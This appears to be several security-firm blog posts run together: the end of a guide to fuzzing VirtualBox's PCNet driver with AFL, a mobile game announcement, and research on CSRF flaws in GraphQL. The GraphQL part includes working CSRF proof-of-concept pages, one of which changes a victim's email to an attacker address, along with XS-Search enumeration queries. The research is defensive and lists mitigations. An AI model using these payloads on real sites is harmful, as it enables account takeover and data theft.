// src/VBox/VMM/VMMR3/PDMDevice.cpp

for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
    // [ SNIP ]
}

The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM. So we wanted to find out if we could leverage it to access the low-level structures. After some digging, we found out that indeed it’s possible to retrieve the VM handle via the IMachineDebugger class:

IMachineDebugger VM

With that, the following snippet of code demonstrates how to access pVM:

LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;

After obtaining the pointer to the VM, we have to change the build scripts again, allowing VboxHeadless to access internal PDM definitions from VBoxHeadless.cpp.

We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:

1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:

/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1

#include "PDMInternal.h"

/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>

/* needed by AFL */
#include <unistd.h>

2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:

            LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */

        /* --------------- BEGIN --------------- */
        LONG64 llVM;
        HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
        PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
        PVM pVM = pUVM->pVM;


        if (SUCCEEDED(hrc)) {

          PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
          PVM pVM = pUVM->pVM;

            for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
                if (!strcmp(pDevIns->pReg->szName, "pcnet")) {

                    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
                    while (__AFL_LOOP(10000))
                    {
                        int len = __AFL_FUZZ_TESTCASE_LEN;
                        pDevIns->pReg->pfnAFL(pDevIns, buf, len);
                    }
                }
            }

        }
        exit(0);
        /* ---------------  END  --------------- */

        /*
         * Pump vbox events forever
         */
        LogRel(("VBoxHeadless: starting event loop\n"));
        for (;;)

In the same file after the #include "PasswordInput.h" directive, add:

#include "harness.h"

Finally, append __AFL_FUZZ_INIT(); before defining the TrustedMain function:

__AFL_FUZZ_INIT();

/**
 *  Entry point.
 */
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)

4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change the VBoxHeadless_DEFS and VBoxHeadless_INCS from

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS      = \
  $(VBOX_GRAPHICS_INCS) \
  ../Common

to

VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS     += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS      = \
        $(VBOX_GRAPHICS_INCS) \
        ../Common \
        ../../VMM/include

Fuzzing With Multiple Inputs

For the network drivers, there are various ways of supplying the user-controlled data by using access I/O port instructions or reading the data from the emulated device via MMIO (PDMDevHlpPhysRead). If this part is unclear, please refer back to [1] in references, which is probably the best available resource for explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save some time, we want to use only these values. Therefore, after some consideration for the implementing of our fuzzing framework, we discovered Fuzzed Data Provider (later FDP).

FDP is part of the LLVM and, after we pass it a buffer generated by AFL, it can leverage it to generate a restricted set of numbers, bytes, or enums. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some buffer.

Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to conform to our prototype:

DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));

All device drivers have a state, which we can access using convenient macro PDMDEVINS_2_DATA. Likewise, we can extend the state structure (in our case PCNETSTATE) to include the FDP header file via a pointer to FDP:

// src/VBox/Devices/Network/DevPCNet.cpp

#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif

// [ SNIP ]

typedef struct PCNETSTATE
{
  // [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
    void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;

To reflect these changes, the g_DevicePCNet structure has to be updated too :

/**
 * The device registration structure.
 */
const PDMDEVREG g_DevicePCNet =
{
  // [[ SNIP ]]
  /* .pfnConstruct = */           pcnetR3Construct,
  // [[ SNIP ]]
  /* .pfnReserved0 = */           pcnetR3_AFL,
  /* .pfnReserved1 = */           pcnetR3_GetFDP,

When adding new functions, we must be careful and include them inside R3 only parts. The easiest way is to find the R3 constructor and add new code just after that, as it already has defined the IN_RING3 macro for the conditional compilation.

An example of the PCNet harness:

static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
    return pThis->fdp;
}

__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
    if (len > 0x2000) {
        __AFL_COVERAGE_SKIP();
        return VINF_SUCCESS;
    }

    static unsigned char buf2[0x2000];
    memcpy(buf2, buf, len);
    FuzzedDataProvider provider(buf2, len);

    PPCNETSTATE     pThis   = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);

    pThis->fdp = &provider; // Make it accessible for the other modules
    FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);

    void *pvUser = NULL;
    uint32_t u32;
    const std::array<int, 3> Array = {1, 2, 4};
    uint16_t offPort;
    uint16_t cb;

    pcnetR3Reset(pDevIns);

    __AFL_COVERAGE_DISCARD();
    __AFL_COVERAGE_ON();

    while (pfdp->remaining_bytes() > 0) {
        auto choice = pfdp->ConsumeIntegralInRange(0, 3);
        offPort = pfdp->ConsumeIntegral<uint16_t>();

        u32 = pfdp->ConsumeIntegral<uint32_t>();
        cb = pfdp->PickValueInArray(Array);

        switch (choice) {
            case 0:
                // pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 1:
                // pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser, 
                //   RTIOPORT offPort, uint32_t u32, unsigned cb)
                pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
                break;
            case 2:
                // pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
                //   RTGCPHYS off, void const *pv, unsigned cb)
                pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
                break;
            default:
                break;
        }

    }
    __AFL_COVERAGE_OFF();

    pThis->fdp = NULL;
    return VINF_SUCCESS;
}

Fuzzing PDMDevHlpPhysRead

As the device driver calls this function multiple times, we decided to patch the wrapper instead of modifying every instance. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.

#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"

#include <fuzzer/FuzzedDataProvider.h> /* Add this */

// [ SNIP ]

/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
    PDMDEV_ASSERT_DEVINS(pDevIns);
    PVM pVM = pDevIns->Internal.s.pVMR3;
    LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
             pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));

    /* Change this for the fuzzed driver */
    if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
        FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
        if (pfdp && pfdp->remaining_bytes() >= cbRead) {
            pfdp->ConsumeData(pvBuf, cbRead);
            return VINF_SUCCESS;
        }
    }

Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even when we can reach more than 10k executions per second, we still have some work to do about the stability.

Improving Stability

Unfortunately, none of these methods described here worked, as we were not able to use LTO instrumentation. We guess that’s because the device drivers module was dynamically loaded, therefore partially disabling instrumentation was not possible nor was possible to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood which are not easy to influence, such as internal locks or VMM.

One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.

Additionally, we can disable the instantiation of all devices which we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, implementing the init completion routine through pdmR3DevInit. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled. Therefore, we can skip the initialization for the rest.

    /*
     *
     * Instantiate the devices.
     *
     */
    for (i = 0; i < cDevs; i++)
    {
        PDMDEVREGR3 const * const pReg = paDevs[i].pDev->pReg;

        // if (!strcmp(pReg->szName, "pci")) {continue;}
        if (!strcmp(pReg->szName, "ich9pci")) {continue;}
        if (!strcmp(pReg->szName, "pcarch")) {continue;}
        if (!strcmp(pReg->szName, "pcbios")) {continue;}
        if (!strcmp(pReg->szName, "ioapic")) {continue;}
        if (!strcmp(pReg->szName, "pckbd")) {continue;}
        if (!strcmp(pReg->szName, "piix3ide")) {continue;}
        if (!strcmp(pReg->szName, "i8254")) {continue;}
        if (!strcmp(pReg->szName, "i8259")) {continue;}
        if (!strcmp(pReg->szName, "hpet")) {continue;}
        if (!strcmp(pReg->szName, "smc")) {continue;}
        if (!strcmp(pReg->szName, "flash")) {continue;}
        if (!strcmp(pReg->szName, "efi")) {continue;}
        if (!strcmp(pReg->szName, "mc146818")) {continue;}
        if (!strcmp(pReg->szName, "vga")) {continue;}
        // if (!strcmp(pReg->szName, "VMMDev")) {continue;}
        // if (!strcmp(pReg->szName, "pcnet")) {continue;}
        if (!strcmp(pReg->szName, "e1000")) {continue;}
        if (!strcmp(pReg->szName, "virtio-net")) {continue;}
        // if (!strcmp(pReg->szName, "IntNetIP")) {continue;}
        if (!strcmp(pReg->szName, "ichac97")) {continue;}
        if (!strcmp(pReg->szName, "sb16")) {continue;}
        if (!strcmp(pReg->szName, "hda")) {continue;}
        if (!strcmp(pReg->szName, "usb-ohci")) {continue;}
        if (!strcmp(pReg->szName, "acpi")) {continue;}
        if (!strcmp(pReg->szName, "8237A")) {continue;}
        if (!strcmp(pReg->szName, "i82078")) {continue;}
        if (!strcmp(pReg->szName, "serial")) {continue;}
        if (!strcmp(pReg->szName, "oxpcie958uart")) {continue;}
        if (!strcmp(pReg->szName, "parallel")) {continue;}
        if (!strcmp(pReg->szName, "ahci")) {continue;}
        if (!strcmp(pReg->szName, "buslogic")) {continue;}
        if (!strcmp(pReg->szName, "pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "ich9pcibridge")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicscsi")) {continue;}
        if (!strcmp(pReg->szName, "lsilogicsas")) {continue;}
        if (!strcmp(pReg->szName, "virtio-scsi")) {continue;}
        if (!strcmp(pReg->szName, "GIMDev")) {continue;}
        if (!strcmp(pReg->szName, "lpc")) {continue;}

       /*
         * Gather a bit of config.
         */
        /* trusted */

The most significant issue is that minimizing our test cases is not an option when the stability is low (the percentage depends on the drivers we fuzz). If we cannot reproduce the crash, we can at least intercept it and analyze it afterward in gdb.

We ran AFL in debug mode as a workaround, which yields a core file after every crash. Before running the fuzzer, this behavior can be enabled by:

$ export AFL_DEBUG=1
$ ulimit -c unlimited

Conclusion

We presented one of the possible approaches to fuzzing VirtualBox device drivers. We hope it contributes to a better understanding of VirtualBox internals. For inspiration, I’ll leave you with the quote from doc/VBox-CodingGuidelines.cpp:

 * (2)  "A really advanced hacker comes to understand the true inner workings of
 *      the machine - he sees through the language he's working in and glimpses
 *      the secret functioning of the binary code - becomes a Ba'al Shem of
 *      sorts."   (Neal Stephenson "Snow Crash")

References


H1.Jack, The Game

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:


That single GraphQL issue that you keep missing

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL what?

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

  • Aggregating data from multiple sources
  • Decoupling the data from the database underneath, through a graph form
  • Ensuring input type correctness with minimal effort from the developers

CSRF eh?

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

GraphQL CSRF: more buzzword combos please!

POST-based CSRF

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept Content-Type headers set to application/json only, which is widely believed to be invulnerable to CSRF. As multiple layers of middleware may translate the incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forego implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

It is common, due to middleware magic, to have a server accepting the same request as form-urlencoded POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

Which a seasoned Burp user can quickly convert to a CSRF PoC through Engagement Tools > Generate CSRF PoC

shell.showItemInFolder
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://redacted/graphql" method="POST">
      <input type="hidden" name="query" value="&#123;&#10;&#32;&#32;user&#32;&#123;&#10;&#32;&#32;&#32;&#32;firstName&#10;&#32;&#32;&#32;&#32;&#95;&#95;typename&#10;&#32;&#32;&#125;&#10;&#125;&#10;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the underlying application layer they are passed, any other query can be issued, including mutations.

GET Based CSRF

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.

For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.

shell.showItemInFolder

While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wise.

For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:

<!DOCTYPE html>
<html>
<head>
    <title>GraphQL CSRF file upload</title>
</head>
	<body>
		<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
	</body>
</html>

The second issue arises when a state-changing GraphQL operation is misplaced in the queries, which are normally non-state changing. In fact, most of the GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issues is trivial, and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.

During an engagement, we discovered the following query that was issuing a state changing operation:

req := graphql.NewRequest(`
	query SetUserEmail($email: String!) {
		SetUserEmail(user_email: $email) {
			id
			email
		}
	}
`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>
<html>
	<head>
		<title>GraphQL CSRF - State Changing Query</title> 
	</head>
	<body>
		<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A%26variables%3D%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%2C%0A%7D"></iframe>
	</body>
</html>

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

urlpatterns = patterns(
    # ...
    url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
)

CSRF: Better Safe Than Sorry

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

  • Built-in CSRF protection in modern frameworks
  • Origin verification
  • Double submit cookies
  • User interaction based protection
  • Not using GET request for state changing operations
  • Enhanced CSRF protection to GET request too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm for their existence/accessibility.

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.

XS-Search is quite a neat and simple technique which can transform the following query in an attacker controlled binary search (eg. we can enumerate the users of a private platform):

query {
	isEmailAvailable(email:"foo@bar.com") {
		is_email_available
	}
}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

Automate Everything!!!

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

  • By identifying various classes of CSRF through new “Send to Repeater” helpers:

    • GET query parameters
    • POST form-data
    • POST x-form-urlencoded
  • By improving the query generation

shell.showItemInFolder

Something for our beloved number crunchers!

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and no conclusiveness nor completeness should be inferred, numbers show an impressive amount of unpatched vulnerabilities:

  • 14 (~50%) were vulnerable to some kind of XS-Search, equivalent to a GET-based CSRF
  • 3 (~10%) were vulnerable to CSRF

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

References